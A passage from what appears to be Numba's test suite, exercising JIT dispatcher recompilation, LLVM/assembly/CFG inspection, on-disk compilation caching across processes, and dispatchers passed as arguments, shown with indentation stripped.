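#             def impl(x, y=5):
#                 return x - y
#         return impl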
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all asm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the asm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Make sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
This tests an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F-contiguous first but the compiler checks
for C-contiguous first. This results in C-contiguous code being
registered as the F-contiguous specialization.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
cached = [old.__cached__]
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError(
"process failed with code %s: \n"
"stdout follows\n%s\n"
"stderr follows\n%s\n"
% (popen.returncode, out.decode(), err.decode()),
)
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
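# Orientation note (hedged, based only on the suffixes used elsewhere in this
# file): the "N index, M data" comments next to check_pycache() calls count
# on-disk cache files, roughly one "*.nbi" index file per cached function plus
# one "*.nbc" data file per compiled signature, e.g.:
#
#     sorted(self.cache_contents())
#     # -> ['add_usecase-<line>.py3X.nbi',
#     #     'add_usecase-<line>.py3X.1.nbc',
#     #     'add_usecase-<line>.py3X.2.nbc', ...]
#
# The exact file names above are an assumption for illustration; the tests rely
# only on the total file count and the .nbi/.nbc split.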
class TestCache(BaseCacheUsecasesTest):
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted code', str(w[0].message))
def test_big_array(self):
# Code that references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings():
warnings.simplefilter('error', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6) # 3 + 3 = 6
f = mod.closure2
self.assertPreciseEqual(f(3), 8) # 3 + 5 = 8
f = mod.closure3
self.assertPreciseEqual(f(3), 10) # 3 + 7 = 10
f = mod.closure4
self.assertPreciseEqual(f(3), 12) # 3 + 9 = 12
self.check_pycache(5) # 1 nbi, 4 nbc
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Functions with the same name should still be disambiguated
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# from_function() returns None since it cannot find the module source;
# it only succeeds when the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
def test_caching_multiple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
msg = f"stdout:\n{out.decode()}\n\nstderr:\n{err.decode()}"
self.assertEqual(popen.returncode, 0, msg=msg)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
msg = f"stdout:\n{out.decode()}\n\nstderr:\n{err.decode()}"
self.assertEqual(popen.returncode, 0, msg)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be passed as an argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_can_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
self.assertEqual(foo(fn), fn)
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# The boxing logic will always raise when converting the Module
# return value back to a Python object.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
